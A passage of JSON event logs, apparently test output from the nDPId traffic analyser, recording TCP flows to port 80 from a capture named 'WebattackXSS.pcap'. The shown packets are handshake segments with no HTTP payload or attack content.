-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5163,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":365,"flow_packet_id":2,"flow_last_seen":1499347585745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347585745,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5ZQRxaCL\/bxLGKAScSAhRAAAAgQFtAQCCAoD5RT1ATtDgAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5165,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":365,"flow_packet_id":3,"flow_last_seen":1499347585746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347585746,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0CJhAAD4GvUCsEAABwKgKMuWUAFD9vEsYEcWgjIAQAOXASwAAAQEICgE7Q4AD5RT1"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347455224,"flow_last_seen":1499347460737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347586996,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57372,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347455224,"flow_last_seen":1499347460737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347586996,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57372,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347456462,"flow_last_seen":1499347461738,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347586996,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57386,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347456462,"flow_last_seen":1499347461738,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347586996,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57386,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347457705,"flow_last_seen":1499347462738,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347586996,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57400,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347457705,"flow_last_seen":1499347462738,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347586996,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57400,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347460253,"flow_last_seen":1499347465739,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347586996,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57426,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347460253,"flow_last_seen":1499347465739,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347586996,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57426,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347461508,"flow_last_seen":1499347466739,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347586996,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57440,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347461508,"flow_last_seen":1499347466739,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347586996,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57440,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347462759,"flow_last_seen":1499347468740,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347586996,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57454,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347462759,"flow_last_seen":1499347468740,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347586996,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57454,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5180,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347588270,"flow_last_seen":1499347588270,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347588270,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58798,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5180,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":366,"flow_packet_id":1,"flow_last_seen":1499347588270,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347588270,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8nX9AAD4GKFGsEAABwKgKMuWuAFBMCdiIAAAAAKACchANQQAAAgQFtAQCCAoBO0X3AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5181,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":366,"flow_packet_id":2,"flow_last_seen":1499347588270,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347588270,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5a7qCbUZTAnYiaAScSBTqgAAAgQFtAQCCAoD5RdtATtF9wEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5183,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":366,"flow_packet_id":3,"flow_last_seen":1499347588271,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347588271,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0nYBAAD4GKFisEAABwKgKMuWuAFBMCdiJ6gm1GoAQAOXysAAAAQEICgE7RfgD5Rdt"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5192,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347589555,"flow_last_seen":1499347589555,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347589555,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58812,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5192,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":367,"flow_packet_id":1,"flow_last_seen":1499347589555,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347589555,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8QWlAAD4GhGesEAABwKgKMuW8AFCYtAZQAAAAAKACchCRfgAAAgQFtAQCCAoBO0c5AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5193,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":367,"flow_packet_id":2,"flow_last_seen":1499347589555,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347589555,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5bxlqZ52mLQGUaAScSBxqgAAAgQFtAQCCAoD5RiuATtHOQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5194,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":367,"flow_packet_id":3,"flow_last_seen":1499347589557,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347589557,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0QWpAAD4GhG6sEAABwKgKMuW8AFCYtAZRZamed4AQAOUQsgAAAQEICgE7RzkD5Riu"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5213,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347592060,"flow_last_seen":1499347592060,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347592060,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58838,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5213,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":368,"flow_packet_id":1,"flow_last_seen":1499347592060,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347592060,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8gghAAD4GQ8isEAABwKgKMuXWAFA6JsujAAAAAKACchAoLQAAAgQFtAQCCAoBO0mrAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5214,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":368,"flow_packet_id":2,"flow_last_seen":1499347592060,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347592060,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5dZ5GzqJOibLpKAScSBWYgAAAgQFtAQCCAoD5RsgATtJqwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5215,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":368,"flow_packet_id":3,"flow_last_seen":1499347592061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347592061,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0gglAAD4GQ8+sEAABwKgKMuXWAFA6JsukeRs6ioAQAOX1aQAAAQEICgE7SasD5Rsg"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5222,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347593330,"flow_last_seen":1499347593330,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347593330,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58852,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5222,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":369,"flow_packet_id":1,"flow_last_seen":1499347593330,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347593330,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8X5xAAD4GZjSsEAABwKgKMuXkAFAOABV0AAAAAKACchAJOAAAAgQFtAQCCAoBO0roAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5223,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":369,"flow_packet_id":2,"flow_last_seen":1499347593330,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347593330,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5eQdKIqzDgAVdaAScSBB+AAAAgQFtAQCCAoD5RxeATtK6AEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5224,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":369,"flow_packet_id":3,"flow_last_seen":1499347593331,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347593331,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0X51AAD4GZjusEAABwKgKMuXkAFAOABV1HSiKtIAQAOXg\/gAAAQEICgE7SukD5Rxe"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5234,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347594595,"flow_last_seen":1499347594595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347594595,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58866,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5234,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":370,"flow_packet_id":1,"flow_last_seen":1499347594595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347594595,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80FRAAD4G9XusEAABwKgKMuXyAFCOVJxwAAAAAKACchAAnQAAAgQFtAQCCAoBO0wkAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5235,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":370,"flow_packet_id":2,"flow_last_seen":1499347594595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347594595,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5fJ5A+8AjlSccaAScSB3+AAAAgQFtAQCCAoD5R2aATtMJAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5237,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":370,"flow_packet_id":3,"flow_last_seen":1499347594597,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347594597,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00FVAAD4G9YKsEAABwKgKMuXyAFCOVJxxeQPvAYAQAOUW\/wAAAQEICgE7TCUD5R2a"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5253,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347597121,"flow_last_seen":1499347597121,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58892,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5253,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":371,"flow_packet_id":1,"flow_last_seen":1499347597121,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347597121,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Xm5AAD4GZ2KsEAABwKgKMuYMAFDbqxDyAAAAAKACchA8MgAAAgQFtAQCCAoBO06cAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5254,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":371,"flow_packet_id":2,"flow_last_seen":1499347597121,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347597121,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5gw3EDJr26sQ86AScSCvnwAAAgQFtAQCCAoD5SARATtOnAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5255,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":371,"flow_packet_id":3,"flow_last_seen":1499347597122,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347597122,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Xm9AAD4GZ2msEAABwKgKMuYMAFDbqxDzNxAybIAQAOVOpwAAAQEICgE7TpwD5SAR"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347465304,"flow_last_seen":1499347470740,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57480,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347465304,"flow_last_seen":1499347470740,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57480,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347466553,"flow_last_seen":1499347471741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57494,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347466553,"flow_last_seen":1499347471741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57494,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347467793,"flow_last_seen":1499347473742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57508,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347467793,"flow_last_seen":1499347473742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347469060,"flow_last_seen":1499347474742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57522,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347469060,"flow_last_seen":1499347474742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57522,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 